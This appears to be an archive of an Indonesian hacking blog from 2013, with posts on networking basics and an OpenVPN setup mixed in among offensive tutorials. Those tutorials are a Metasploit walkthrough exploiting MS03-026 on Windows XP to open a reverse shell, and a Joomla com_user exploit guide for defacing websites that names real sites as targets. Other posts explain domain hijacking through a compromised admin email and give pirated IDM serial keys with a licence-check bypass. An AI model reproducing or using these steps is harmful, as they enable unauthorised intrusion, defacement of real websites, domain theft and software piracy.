Selasa, 05 November 2013

Exploit and Gain Remote Access to Windows XP (Metasploit)


Before we start hacking, let’s familiarize ourselves with Metasploit so that when I use certain terms, we all understand them to mean the same thing. When first looking at the Metasploit Framework, it can be a bit overwhelming with the various interfaces, options, utilities, and modules. Here we’ll try to make it understandable so that we can execute our first exploit.

Terminology

The following terminology is not only used within the Metasploit Framework, but throughout the professional hacking and penetration testing communities. As a result, any professional in this field should be familiar with these terms and be able to clearly distinguish them.
  • Exploit
Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access). Some more common exploits that you’ve probably already heard of are SQL injections, buffer overflows, etc.
  • Payload
A payload is the program or code that is delivered to the victim system. Metasploit has pre-built payloads for this purpose included in the highly useful Meterpreter, or you can develop your own. This payload is designed to provide the attacker with some capability to manage or manipulate the target system for their particular needs.
  • Shellcode
This is a set of instructions used as a payload when the exploitation occurs. Shellcode is typically written in assembly language, but not necessarily always. It’s called “shellcode” because a command shell or other command console is provided to the attacker that can be used to execute commands on the victim’s machine.
  • Module
A module is a piece of software that can be used by the Metasploit Framework. These modules are interchangeable and give Metasploit its unique power. These modules might be exploit modules or auxiliary modules.
  • Listener
This is that component that listens for the connection from the hacker’s system to the target system. The listener simply handles the connection between these systems.
  • Show
Metasploit Framework has hundreds of modules and other utilities. As a result, you will not be able to remember them all. Fortunately, the show command can grab a listing of all modules, options, targets, etc. in your framework.
Now that we have the basics of Metasploit concepts and commands down, let’s hack a system!

Step 1: Getting Started

First, open a terminal in Linux.
One of the most reliable hacks is on the ubiquitous Windows XP system with the RPC DCOM. It’s a buffer overflow attack that enables the attacker to execute any code of their choice on the owned box (note Microsoft’s comment under impact of vulnerability). Microsoft identifies it as MS03-026 in their database of vulnerabilities. In our case, we will use it to open a reverse shell on our target system.

Open the the Metasploit console.
msfconsole
Be patient, it takes awhile for Metasploit to load all of its modules. The current version of Metasploit has 823 exploits and 250 payloads.

Step 2: Find the Exploit

Metasploit allows you to search using the search command. In our case, we are searching for a DCOM exploit, so we can simply type:
msf > search dcom




Step 3: Set the Exploit

Now let’s tell Metasploit what exploit we want to use. Type use and the name of our exploit, exploit/windows/dcerpc/ms03_026_dcom.
msf > use exploit/windows/dcerpc/ms03_026_dcom

Note that the prompt has changed and now reflects our chosen exploit.

Step 4: Set the Options

Now that we’ve chosen our exploit, we can ask Metasploit what our options are. By typing show options, Metasploit will list our options in executing this exploit.
msf > show options


Step 5: Set Remote Host

Metasploit will now ask us for the RHOST. This will be the IP address of the remote host or the machine we’re attacking. In our case, it’s 10.0.0.3. Use the actual IP address of the machine you are attacking. Tools such as nmap can help in identifying the IP address of the machine you are attacking. Notice in the picture above that Metasploit tells us that we will be using (binding) port 135.
msf > set RHOST 10.0.0.3
Step 6: Show Payloads
Next, we check to see what payloads are available for this exploit. Type show payloads at the Metasploit prompt:
msf > show payloads


Step 7: Set Payload

Now that we can see what payloads are available, we can select the generic/shell_reverse_tcp by using the Metasploit console set command. If successful, this will establish a remote shell on the target system that we can command.
msf > set PAYLOAD generic/shell_reverse_tcp


Step 8: Set Local Host

Now that we’ve chosen the exploit and the payload, we need to tell Metasploit the IP address of our attacking machine. In this example, our target system has an IP address of 10.0.0.6. Use the actual IP address of the system you are attacking. Tools such a nmap, can help you obtain IP addresses.
msf > set LHOST 10.0.0.6


Step 9: Exploit

Now we command Metasploit to exploit the system:
msf > exploit

Step 10: Open a Shell on the Hacked System

Type the command sessions –i 1 to open a command shell on the XP system that will appear on your Metasploit console.
sessions –i 1
To confirm that the command shell is on the Windows XP system, type dir to get a directory listing on the Windows XP system that you now own!
C: >dir
Congratulations! You have just hacked your first system using Metasploit!

Jumat, 18 Oktober 2013

Penanganan DNS Hijecking

http://i.imgur.com/DfyDkt5.png
Hallo Betermu lagi dengan saya hehehe... jadi gini mas aq mau jelasin tata cara sholat lima waktu ehh penanganan DNS Hijecking brakakaka... semoga saja aku bisa ya mas :D doain aku mas...

teknik newbie saya ini mungkin bisa membantu buat admin heheheh langsung aja ya mastah
  1. lah apa lagi ya bingung aku emmb.. oh iya set dns nya misal kalau mastah2 di sini nggk punya banyak uang jadi kan terpaksa hosting di hostingan gratis kek idhostinger atau lain sebagainya aku sarankan buat para mastah jangan SET NAME SERVER ! kek ns1.idhostinger.com jangan itu mas hati2 loh :v suer deh cukup saja dengan Host A Record Di Domain Contoh misal ya www.dancok.com harus inget mas itu www :v kalau emang mau bener2 mau sangat ya pasang aja di *.dancok.com nya le ip shared nya nya contoh ya http://i.imgur.com/DfyDkt5.png nah contoh shared ip nya :v hehehe...
  2. mencari hostingan yang benar2 aman dan tentram gan :D kalau bisa beli vps endiri :v
  3. jika pusing dengan tutorial ini silahkan hub dokter hewan atau kimcil :v
nanti aku update video tutorial nya deh :)

Pelajari Tentang DNS Hijacking/Pembajakan Dns

Pembajakan domain merupakan proses di mana Nama Domain Internet dicuri dari pemiliknya yang sah. Pembajakan domain ini

juga dikenal sebagai pencurian/pengambil alihan nama domain oleh pihak yang tidak sah. Sebelum kita dapat melanjutkan untuk mengetahui bagaimana untuk membajak nama domain, perlu memahami bagaimana sebuah nama domain bekerja dan bagaimana mereka berhubungan dengan server web.

Cara Kerja Nama Domain:
situs gohacking.com mengatakan misalnya terdiri dari dua bagian. Nama domain (gohacking.com) dan hosting web server

tempat file server website yang dihosting . Pada kenyataannya, nama domain dan web hosting server (web server) adalah dua bagian yang berbeda dan karenanya mereka harus diintegrasikan sebelum web dapat beroperasi dengan sukses.Integrasi nama domain dengan web server hosting dilakukan sebagai berikut.

1.Setelah mendaftarkan nama domain baru, kita mendapatkan panel kontrol/cpanel. di mana kita dapat memiliki kontrol penuh dari domain.

2.Dari panel kontrol domain ini, ditunjukkan nama domain kita ke web server tempat file-file website disimpan.

Apa yang terjadi ketika sebuah domain yang dibajak?

Untuk membajak sebuah nama domain hanya diperlukan akses ke panel kontrol domain/C-panel dan arahkan nama domain kebeberapa server web lainnya selain yang asli.Jadi untuk membajak sebuah domain Anda tidak perlu mendapatkan akses ke webserver target.

mungkin sebagai contoh saya/anda berhasil mendapatkan hak akses panel kontrol nama domain sebuah perusahaan, maka dengan mudah saya dapat menkonfigurasi modul, dan hal2 lainya dalam website tersebut.
Bagaimana nama domain yang dibajak?

sebenarnya banyak metode & skenario untuk melakukan hal ini, tetapi secara umum saya gambarkan hal-hal yang dibutuhkan adalah sebagai berikut:
1. Target atau nama domain yang anda ingin ennumerasi/eksploitasi
2. Alamat Email yang berhubungan dengan nama domain, yang digunakan untuk registrasi domain

mengenai hal ini anda dapat memanfaatkan web yang memberikan informasih ini seperti domain
http://wwww.domainwhitepages.com atau http://whois.domaintools.com/ dan masih banyak yang lainya”googling mugkin anda bisa menemukan lebih banyak”pada bagian feelbox anda hanya sisa memasukkan nama domain target, lalu klick bottun untuk mengeksekusi…setelah proses scanner dilakukan maka whois record akan menampilkan data2 mengenai halaman target termasuk kontak email administrasi web tersebut

Untuk mendapatkan nama pendaftar domain, cari sesuatu seperti ini di bawah Whois Record. “Registration Service Provided

By: XYZ Company”. “Pendaftaran Layanan yang Disediakan Oleh: XYZ Company”. Here XYZ Company is the domain registrar.

Perusahaan XYZ di sini adalah pendaftar domain. Dalam kasus jika Anda tidak menemukan, kemudian pilih scroll ke atas akan ditunjjukan ICANN Registrar di bawah “Registry Data”. Dalam skenario ini,ICANN registrar adalah pendaftar domain.

Administrasi alamat email yang terkait dengan domain adalah backdoor untuk membajak nama domain. Ini adalah kunci untuk membuka panel kontrol domain.Jadi untuk mengambil kendali penuh dari domain, penyerang akan mekakukan hacking email administrasi yang digunakan Setelah penyerang mengambil kontrol penuh atas account email ini, sipenyerang akan mengunjungi website pendaftar domain dan mengklik lupa password di halaman login.

Di sana ia akan diminta untuk memasukkan salah satu nama domain atau alamat email administratif untuk memulai proses reset password .Setelah selesai semua data untuk me-reset Password akan dikirimkan ke alamat email administrasi.

Karena sipenyerang memiliki hak akses ke account email ini ia dapat dengan mudah me-reset password domain control panel.setelah pengaturan ulang password atau kata sandi, lalu login ke panel kontrol dengan password baru dan dari sana ia dapat membajak domain dalam beberapa menit.
gambar diatas adalah sampel contoh sebuah halaman konfigurasi web/ panel kontrol/C-panel, untuk mengendalikan penuh sebuah halaman website, atau DNS

Kamis, 17 Oktober 2013

Belajar Jaringan Part 8

Pelajar basic kita sudah hampir selesei,

Dari Belajar Jaringan PART VII (basic) yang membahas tentang router sekarang kita akan mengetahui tentang hub dan switch

Sebenarnya fungsinya hampir mirip yaitu menjadi perantara pada suatu jaringan.

Hub 

Suatu perangkat yang memiliki banyak port yang akan menghubungkan beberapa node (komputer) sehingga membentuk suatu jaringan pada topologi star.





Seperti gambar diatas itu hub, saya tidak promosi merk hanya males edit aja

Cara Kerja : Ketika sebuah paket tiba disalah satu port.

Paket itu akan disalin ke port-port yang lain di hub.

Atau dengan kata lain hub hanya menyalin data ke semua simpul yang terhubung ke hub.

Hal ini menyebabkan untuk kerja jaringan akan lambat.

Hub dengan spesifikasi 10/100Mbps harus berbagi bandwidth dengan masing-masing port.

Jadi ketika hanya satu PC yang menggunakan, akan mendapat akses bandwith yang maksimum yang tersedia.

Namun jika beberapa PC beroperasi atau digunakan pada jaringan tersebut, maka bandwidth akan dibagi kepada semua PC, sehingga akan menurukan kinerja jaringan


Switch




Gambar diatas adalah Switch, sekilas mirip tapi switch memiliki beberapa keunggulan dibanding hub.

Cara kerja :


Ada dua arsitektur dasar yang digunakan yaitu : cut-through dan store and forward

Switch cut trough memiliki kelebihan disisi kecepatan karena ketika sebuah paket datang, switch hanya memperhatikan alamat tujuan sebelum diteruskan ke segmen tujuannya.

Sedangkan switch store and forward merupakan kebalikan dari switch cut-trough.

Swtich ini menerima dan menganalisa seluruh isi paket sebelum meneruskannya ketujuan dan untuk memeriksa satu paket memerlukan waktu, tetapi ini memungkinkan switch untuk mengetahui adanya kerusakan pada paket dan mencegahnya agar tidak mengganggu jaringan.

Switch dengan spesifikasi 10/100Mbps akan mengalokasikan 10/100Mbps penuh untuk setiap portnya .

Jadi berapapun jumlah komputer yang terhubung, pengguna akan selalu memiliki bandwidth penuh.

Ok sekian dulu post kali ini kita akan kembali lagi di post Belajar Jaringan Selanjtnya :v

Belajar Jaringan Part 7

Lanjut dari Belajar Jaringan PART VI (basic)

Sekarang kita harus mengetahui tentang Alat yang akan dipergunakan dalam jaringan,

Pertama kita akan memahami tentang Router.


Router adalah komputer khusus yang memiliki tugas utama mengirimkan paket melalui jaringan komputer,

Maksudnya sebagai perantara antara komputer 1 dengan yang lain .

Dalam router ini jalur jaringan ditentukan dan dipilih sehingga paket data terkirim tepat dan akurat

Router mempunyai beberapa komponen yang perlu kita ketahui.

1. CPU (Central Processing Unit) tugasnya menjalankan instruksi system oprasi. seperti menganalisis system, fungsi routing dan fungsi switching.

2. RAM (Random Access Memory) berisi file salinan konfigurasi router, data yang disimpan disini sifatnya tidak permanent akan hilang apabila router direstart

3. ROM (Read-Only Memoory) tugasnya menyimpan diagnosis software yang digunakan ketika router mulai dinyalakan. Menyimpan program bootsrap dari router

4. NVRAM (Non-volatile RAM) Menyimpan semua konfigurasi Router

5. Flash Memory ini adalah IOS router , kalau dikomputer kita biasa melihatnya BIOS

6. Interface ini seperti port ethernet, fast ethernet, console, serial dsb (tergantung router yang kita pakai)

Ok sekian dulu tentang Router , kita berlanjut ke postingan selanjut nya :v

Belajar Jaringan Part 6

Berlanjut dari post sebelumnya pada Belajar Jaringan PART V (basic),

Sekarang kita akan membahas NAT (Network Adress Tranlastion)

Nat berfungsi untuk mengatur Private adress mengakses Internet dengan public address

Kita dapat liat contohnya pada WARNET, Kantor, dan berbagai instansi yang memakai jaringan untuk mengakses internet.

Kalau yang familiar sama speedy, kita kadang mengetahui IP local kita berbeda dengan IP public kita, khususnya pengguna yang memakai speedy dinamic.

Nah itulah Fungsi dari NAT...


Maksudnya ngertikan ?

Keuntungannya nat itu public addressnya di sharing , asal dapat akses dari admin jaringan kita bisa make semua , keamanannya pun cukup bagus, LAN nya bisa di perbesar scalanya, control nya ada di local router.
Ga enaknya softwarenya terbatas, rawan kena remote orang, kecepatan internet jadi lambat karena kita share
Nah ini dia ... liat kan yang di kotak buram itu , itu NATnya ...

kalo kita bisa analisa kotak yang berwarna buram itu mempunyai IP kelas C seperti yang kemaren kita bahas dipost sebelumnya padahal IP publicnya adalah 209.165.202.130 tetapi semua yang ada di dua komputer di bawah itu nantinya bisa konek ke internet...
Ok sekian dulu tentang NAT kita akan lanjut ketingkat selanjutnya pada postingan selanjut nya :v

Belajar Jaringan Part 5

Subnet mask adalah lanjutan pembahasan dari Belajar Jaringan PART IV (basic),

Setelah kita sedikit mengetahui logika dari subnet mask itu sendiri sekarang kita akan coba mengenal lebih jauh tetang subnet mask.

Dalam perhitungan subnet mask kita menggunakan bilangan biner 32 bit dalam membedakan network dan host, sehingga kita dapat menentukan suatu host berada pada jaringan yang mana.

32 bit itu maksudnya ada 32 angka  dalam subnet mask , contohnya pada subnet mask default kelas C

255.255.255.0 = 11111111.11111111.11111111.00000000 (apabila belum paham cara penghitungan biner silahkan tanya ke mbah google dulu, atau menunggu saya menjelaskan tentang perhitungan bilangan biner)

Anda pasti pernah melihat tulisan seperti ini 192.168.1.10/24 iya kan, maksudnya /24 disitu adalah ada 24 angka satu pada subnet mask tersebut , dilihat dari sisi kiri kekanan seperti pada contoh diatas,

ada rumus untuk menghitung subnet mask :


JumlahSubnet = 2N
Jumlah Hostper Subnet = 2H – 2
Blok Subnet
Host dan Broadcast yang valid?
dimana,
N = Jumlah bityang dipinjam
H = Jumlah bit sisa

  
Sekarang kita lihat tabelnya agar lebih jelas....

 
Dan seterusnya , Mungkin sekian dulu sharing tentang subnet mask , kita akan kembali melanjutkan 
pelajaran jaringan basic kita di posting selanjut nya

Belajar Jaringan Part 4


Part ke IV ini kita akan mencoba memahami tentang IP (Internet Protokol)

Seperti yang saya jelaskan di Belajar Jaringan PART III (basic) , setiap host itu jelas memerlukan adanya alamat agar dapat melakukan aktifitas dalam jaringan. Baik dalam mengirim ataupun menerima.

Ip disetting pada NIC (Network Interface Card), kalau kita biasa liat itu LAN card ya... (model2 gitulah...)

Yang perlu kita ketahui tentang IP adalah kelas IP ,

biar gampang pahamnya kita liat digambar ini aja ya ... saya males buat tabelnya soalnya ... hehehe


Dari gambar diatas kita dapat mengetahui nilai dari tiap2 kelas IP itu sendiri, jadi kita sekarang bisa jawab IP di komputer kita itu IP kelas apa ,

Jawabnya kelas C, karena IP kelas C D E itu adalah IP yang kita gunakan pada Jaringan Local, dan IP kelas A dan B itu diperjual belikan alias ga Gretongan...


Kelas IP diatas adalah perhitungan untuk IPv4, kita bisa melihat contohnya pada settingan LAN card kita


Ip kelas A dan B sekarang sudah habis dipakai , sehingga sekarang dibuat IPv6 nanti kalau sempet saya buat postnya tentang IP versi 6 ini , sementara kita belajar yang versi 4 aja dulu.

Sekarang kita coba memahami Subnet Mask , ini fungsinya untuk membedakan Network pada jaringan.

Logika gampangnya gini , kita dalam Kelurahan ada beberapa jalan , misalnya ada jalan anggur, jalan nanas, jalan jeruk dan sebagainya.

Jalan ini bisa kita analogikan sebagai tugas subnet mask , yaitu untuk membedakan jaringan yang akan dipakai.

Contoh dari subnet mask : 255.255.255.0 (subnetmask default kelas C)

Untuk cara penghitungan Subnet Masknya kita akan masuk ke postingan SELANJUTNYA :v

Belajar Jaringan Part 3


Setelah cukup memahami Belajar Jaringan PART II (basic)

Sekarang kita akan membahas standarisasi Protokol.

Karena tiap vendor pada awalnya memiliki standart sendiri dalam memakai protokol untuk jaringan,

kalau logika saya sih ... apabila tidak dibuat standar Internasional tentang protokol ini akan ada banyak masalah ketika kita ingin mengakses sebuah informasi data dari sumber yang berbeda vendor. (Repot banget kan)

nah akhirnya ini nih , IEEE membuat standarnya ,

IEEE (Institute of Electrical and Electronic Engineers)adalah suatu organisasi profesional yang memiliki aktivitas utama berupa membangun standar komunikasi dan jaringan.

Dengan bla bla bla blanya(maksudnya setelah melalui proses yang panjang sekali, kalau saya taro disini takut kepanjangan),

diharuskan adanya identifikasi pada sebuah devices yaitu Physical address atau MAC address dan logical address atau biasa kita sebut IP itu lho...

IP kepanjangan dari Internet protokol,

ada beberapa kelas dalam IP ,

kalau saya tidak salah ingat ada lima kelas (A,B,C,D,E)

Kelas2 dalam IP itu digunakan tergantung fungsinya , nanti kita akan membahas lebih lanjut tentang kelas IP,

MAC address artinya Media Access Control Address kalo di komputer kita bisa cek di cmd ,lalu kita ketikan ipconfig /all

(tau kan cara buka cmd , kalo ga tau coba pencet tombol windows + R terus tulis cmd)

Cara mikir gampangnya, MAC address itu seperti nama orang , kalau Logical address itu seperti alamat orang

Sampai sini dulu masalah protokolnya ya , kita akan lanjut lagi di post selanjutnya karena hal yang kita bahas masih banyak sekali ....

Belajar Jaringan Part 2


Setelah kita membaca post sebelumnya pada Belajar Jaringan PART I (basic)

Sekarang kita akan memahami beberapa hal berikutnya..

Element yang berperan ketika kita membuat sebuah jaringan :

Sender atau pengirim pesan

Receiver atau penerima pesan

Channel atau jalan yang nantinya akan dilalui oleh data

Di jaringan komputer sender biasanya adalah sebuah komputer yang mengirim pesan ke komputer lainnya , walaupun itu melewati internet tetapi sebenernya kita mengirim pesan kesuatu server (nah server itu juga komputer),

Pesan dikirim melalui channel yang nantinya kita sebut dengan jaringan ,

akan tetapi pada jaringan kita harus mengetahui adanya peraturan2 yang diterapkan pada jaringan , fungsinya untuk membuat data benar2 dipastikan sampai kepada tujuan.

Untuk itu kita harus mengetahui adanya PROTOKOL (standar aturan pada jaringan)

Protokol mengatur :

1. Message format (Bentuk Pesan)

2. Message size (Ukuran Pesan)

3. Timing (Pewaktuan)

4. Encapsulation (Pembungkusan)

5. Encoding (Pengkodean)

6. Message pattern (Pola Pesan)

Untuk lebih jelasnnya anda dapat searching di mbah google ya , karena disini saya hanya akan menjelaskan sedikit pengertian dan konsepnya saja

wkakwakaw tunggu part 3 nya ya

Belajar Jaringan Part 1


Untuk belajar jaringan komputer ada beberapa hal penting yang perlu kita ketahui dahulu, silahkan lihat keterangan yang sudah diringkas dibawah ini..

Seperti namanya jaringan, pastinya kita akan mengingat kata "jaring". Seperti yang dipakai nelayan untuk menangkap ikan, yang perlu kita pahami disini adalah pola pada jaring tersebut, tersambungnya beberapa benang menjadi satu kesatuan yang akhirnya dapat kita gunakan untuk sesuatu yang berguna.

Karena yang akan kita bahas disini adalah jaringan komputer , so sudah jelas kita membutuhkan beberapa peralatan yang nantinya akan menjadikan jaringan itu terbentuk seperti dibawah ini:

Host adalah peralatan yang mengirim dan menerimapesan langsung melalui jaringan.

Shared peripherals tidak langsung terhubung denganjaringan namun berkomunikasi melalui host.

Networks devices digunakan untuk menghubungkanantar host serta mengatur lalu lintas data pada jaringan.

Networks media digunakan untuk menghubungkanhost dengan networks devices atau antar networksdevices.

Setelah kita tau komponen paling mendasar pada jaringan sekarang kita akan coba membuat jaringan sederhana,Untuk melakukan simulasi jaringan kita harus mempunyai tools atau software yang dapat mensimulasikan jaringan yang akan kita buat nanti. Paket Tracer namanya..

Silahkan download filenya disini

STOP !!!Tunggu Part 2 Nya hehehe

Aktifasi IDM tanpa menggunakan apps crack

Cara ini bisa digunakan untuk IDM versi berapa saja (^_^)

Silahkan download IDM versi terbaru di WEBSITE nya.

Install... kalo ada peringatan fake serial atau disuruh register abaikan dulu / klik cancel.

Lalu perhatikan cara berikut :

1. Hal pertama yg harus kita lakukan adalah mematikan / memutuskan koneksi internet komputer kita.

2. Setelah itu isi registration.
First name, last name, dan email terserah kita. Untuk serial number gunakan (pilih salah satu) :

1B0C2-NOGKB-AH0DH-W8R3C
S89JW-J3KDR-KBHW5-RMQ8H
QVD3H-ZY9K1-GW94Z-XOLQS
1XL56-8BB1L-TTQII-89DFX
X33SI-6BW37-SQG4D-FGN8M
1O6SO-LOOFL-ZFW66-EIF97
UXX3S-9N0NT-M74X0-DESMI
W3J5U-8U66N-D0B9M-54SLM
EC0Q6-QN7UH-5S3JB-YZMEK
GZLJY-X50S3-0S20D-NFRF9


Lalu klik OK


3. Buka windows explorer, cari file bernama hosts di C:\WINDOWS\system32\drivers\etc\hosts


Buka file hosts tersebut dengan notepad.


4. Lalu copas code berikut :
127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 www.secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
127.0.0.1 www.mirror.internetdownloadmanager.com
127.0.0.1 mirror2.internetdownloadmanager.com
127.0.0.1 www.mirror2.internetdownloadmanager.com
127.0.0.1 mirror3.internetdownloadmanager.com
127.0.0.1 www.mirror3.internetdownloadmanager.com
127.0.0.1 174.133.70.98

Letakkan dibawah tulisan 127.0.0.1 localhost


Setelah itu save (Ctrl S).


5. Nyalakan kembali koneksi internet.

Beress... IDM kita sudah full version... tanpa harus menggunakan crack (^_^)


Dipake buat download nggak ada masalah... normal seperti biasa... (^_^)



Selamat mencoba... dan ucapkan selamat tinggal kepada crack... hahahaa... (^_^)

Tambahan :

1. Kalo file hosts nggak ketemu, ada kemungkinan terhidden. Aktifkan view hidden files di windows explorer.

2. Untuk pengguna windows vista / windows 7, ada beberapa cara edit file hosts nya :
- Copy file hosts ke drive lain selain drive C, edit dengan notepad kemudian save, copy paste file tersebut ke tempat asal folder file hosts
- Edit nya via administrator
- Edit nya via safe mode

3. Karena kita telah mem-block main download server IDM (mirror2.internetdownloadmanager.com), maka untuk mendownload versi terbaru dari IDM, pilih download from Cnet, atau dari Mirror Site yg ada di Page Download.

Com_User Exploit Defaceing

ehm,, jumpa lagi nih dengan coretan2 semerawut ane tapi ngangenin untuk dibaca,, wkkwkwk yo dah, dah pasti pada ga sabar kan udah nunggu dari kemaren?? wkwkwk langsung daaahh :pSilahkan tutorial ini di baca dulu baik2, dipahami dan dipelajari, baru dah sobat praktekin :p kalo seandainya gagal, itu karena website udah di patch :p

"Talk Less Do More!" :p

oke dah simak nih! sebelumnya download dulu bahan2nya :p

1. Download : Exploit Joomla.html    Password: Lihat


UPDATE:

Ciri2 web yg vuln com_user, silahkan sobat check dulu login adminnya, jika seperti gambar dibawah, berarti web tersebut memungkinkan untuk bisa di exploitasi, selain itu tidak bisa...

Contoh :
http://troytradingint.com.pe/administrator/

bira lebih memudahkan sobat dalam mencari web target, silahkan gunakan Tool Scanner Com User

Demo:
http://troytradingint.com.pe/
http://www.uog.edu.pk/
http://www.trexperts.com/jeffreytmiller/

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah Langkah::

1. Cari web target di Google.com dengan memasukkan Dork berikut:

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

#Dork Kembangin Sendiri :p

2. Pilih target sobat, lalu masukin exploit berikut:

index.php?option=com_users&view=registration

3. Ane disini mengambil contoh:

http://mobile.resto-lincontournable.com/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss

4. kemudian ane ganti menjadi:

http://mobile.resto-lincontournable.com/index.php?option=com_users&view=registration



5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboard CTRL+U

kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:

6. Copy kode tersebut, lalu buka Exploit Joomla.html yang udah sobat download tadi dengan Notepad, lalu pastekan kode tersebut, dan masukkan juga site target dan Email sobat! liat gambar !
Note: username, email, boleh diganti sesuka hati.
7. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register!
8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!


9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!







10. Lalu masuk kehalaman admin login nya! 
http://mobile.resto-lincontournable.com/administrator
11. Masukkan Username & Passwordnya! lalu klik Login! kalo contoh disini:

Username:genesis
Password:onix
Tararaaaaaaaaaaaaaa!! Sobat masuk sebagai admin! trus tebas deh index nya :p Liat Cara Tebas Index

KALO GA BERHASIL LOGIN SEBAGAI ADMIN, SILAHKAN CARI TARGET LAINNYA!!
Goodluck!!! :p

udah gitu aja! Salam........ :p
Content Created By Onix AQua

Mengaktifkan Telnet Client Di Windows 7


 telnet hemm kita sekarang telnet2an hahahaha membahas tentang telnet di win 7 emang sih win 7 bawaan nggk terpasang telnet tapi kita coba aktifin :) ok kaka..... jangan menertawakan aku ya kaka
Start > Control Panel > Programs And Features > Turn Windows features on or off > Check Telnet Client > tekan Ok
http://i.imgur.com/ZsZXTrD.png

Install openVPN di VPS CentOS 5

http://fadhly.web.id/wp-content/uploads/2013/02/openvpn_logo1.pngHai kembali bersama saya yg kangen untuk share yg kali ini mengenai langkah² instalasi openVPN ke VPS.
begini langkahnya :D

Sebelumnya cek dahulu apakah Tun/Tap di vps sudah aktif apa belum, begini caranya :


ketikan command ini:
# ls -al /dev/net/tun
apabila sudah enabled maka akan muncul pesan seperti berikut:
crw——- 1 root root 10, 2010 May 10 16:21 /dev/net/tun
dan bila belum aktif lakukan langkah berikut ini  :
#mkdir -p /dev/net
#mknod /dev/net/tun c 10 200
#chmod 600 /dev/net/tun
#ls -al /dev/net/tun
langkah selanjutnya install gcc, autoconf.noarch, zlib-devel, pam-devel, openssl-devel
Download paket yang diperlukan :
#wget http://openvpn.net/release/openvpn-2.0.9.tar.gz
#wget http://openvpn.net/release/lzo-1.08-4.rf.src.rpm
Install paket yang telah didownload dengan cara berikut:
#rpmbuild --rebuild lzo-1.08-4.rf.src.rpm
#rpm -Uvh /usr/src/redhat/RPMS/i386/lzo-*.rpm
#rpmbuild -tb openvpn-2.0.9.tar.gz
#rpm -Uvh /usr/src/redhat/RPMS/i386/openvpn-2.0.9-1.i386.rpm
apabila mesinnya menggunakan 64bit maka direktorinya biasanya: /usr/src/redhat/RPMS/x86_64/
Sekarang kita copy file konfigurasi nya menuju folder /etc/openvpn
 #cp -r /usr/share/doc/openvpn-2.0.9/easy-rsa/ /etc/openvpn/
Building certificate (membuat sertifikat), masuk direktori /etc/openvpn/easy-rsa/2.0
#cd /etc/openvpn/easy-rsa/2.0
#source ./vars
#./vars
#./clean-all
#./build-ca

akan muncul tulisan2 aneh seperti ini:
Generating a 1024 bit RSA private key
………………………++++++
…………………….++++++
writing new private key to ‘ca.key’
—–
You are about to be asked to enter information that will be incorporatedinto your certificate request.What you are about to enter is what is called a Distinguished Name or a DN.There are quite a few fields but you can leave some blankFor some fields there will be a default value,If you enter ‘.’, the field will be left blank.—–
Country Name (2 letter code) [KG]:
State or Province Name (full name) [NA]:
Locality Name (eg, city) [BISHKEK]:
Organization Name (eg, company) [OpenVPN-TEST]:
Organizational Unit Name (eg, section) []:
Common Name (eg, your name or your server’s hostname) []:
OpenVPN-CAEmail Address [me@myhost.mydomain]:
Kalau tidak mau repot tekan enter saja.
Build key server
 #./build-key-server server
Akan keluar tulisan2 seperti yang diatas, yg perlu diisi hanya pada “Common Name”, di sini masukkan kata: server
Build Diffie Hellman
#./build-dh
Build certificate untuk client:
#./build-key vpnhome
Akan keluar tulisan2 seperti yang diatas, yg perlu diisi hanya pada “Common Name”, di sini masukkan kata: vpnhome

Sekarang copy sertifikat2 tersebut ke /etc/openvpn/keys
#cp /etc/openvpn/easy-rsa/2.0/keys /etc/openvpn/keys -R
bikin file server.conf dan letakkan di /etc/openvpn , isi dengan baris berikut :
# nano /etc/openvpn/server.conf
Copas konfigyrasi berikut:
local 74.208.x.x #-- sesuaikan dengan IP server anda
port 9999 #-- port yang dibuka
proto udp #-- pilih udp atau TCP , klo TCP bisa under proxy
dev tun
ca keys/ca.crt #-- lokasi sertifikat ca.crt
cert keys/server.crt #-- lokasi sertifikat server.crt
key keys/server.key #-- lokasi server.key
dh keys/dh1024.pem #-- lokasi dh1024.pem
server 10.8.0.0 255.255.255.0 #-- alokasi nomer IP client/server
ifconfig-pool-persist ipp.txt #-- supaya alokasi IP client tdk berubah2
push "redirect-gateway def1" #-- supaya gateway koneksi berubah ke server
push "dhcp-option DNS 4.2.2.1" #-- untuk merubah DNS
push "dhcp-option DNS 4.2.2.2" #-- sama kayak atas
keepalive 5 30
comp-lzo #-- sistem kompresi (wajib aktif di client maupun di server)
persist-key
persist-tun
status server-tcp.log
verb 3  
Server siap dijalankan, dengan command sbb:
#service openvpn start
atau
#openvpn /etc/openvpn/server.conf
Ok sekarang openVPN server sudah siap , sekarang tinggal bagaimana caranya supaya client dapat menikmasti koneksi seakan-akan direct connection. Yang kita akan lakukan adalah setting firewall :

1. Enabling packet forwarding dengan command:
#echo 1 > /proc/sys/net/ipv4/ip_forward
2. Edit NAT table untuk MASQUERADING
Command berikut khusus untuk server Dedicated saja:
#iptables -t nat -A POSTROUTING -s IPMU/24 -o eth0 -j MASQUERADE
Sedangkan untuk VPS (openvz), command nya adalah sbb:
#iptables -t nat -A POSTROUTING -s IPMU/24 -o venet0 -j SNAT --to 74.208.x.x
IP disesuaikan dengan IP venet0 di VPS anda.
Tutor Ini Dari SHL :))

Rabu, 16 Oktober 2013

Bypass RDP/RDC Windows



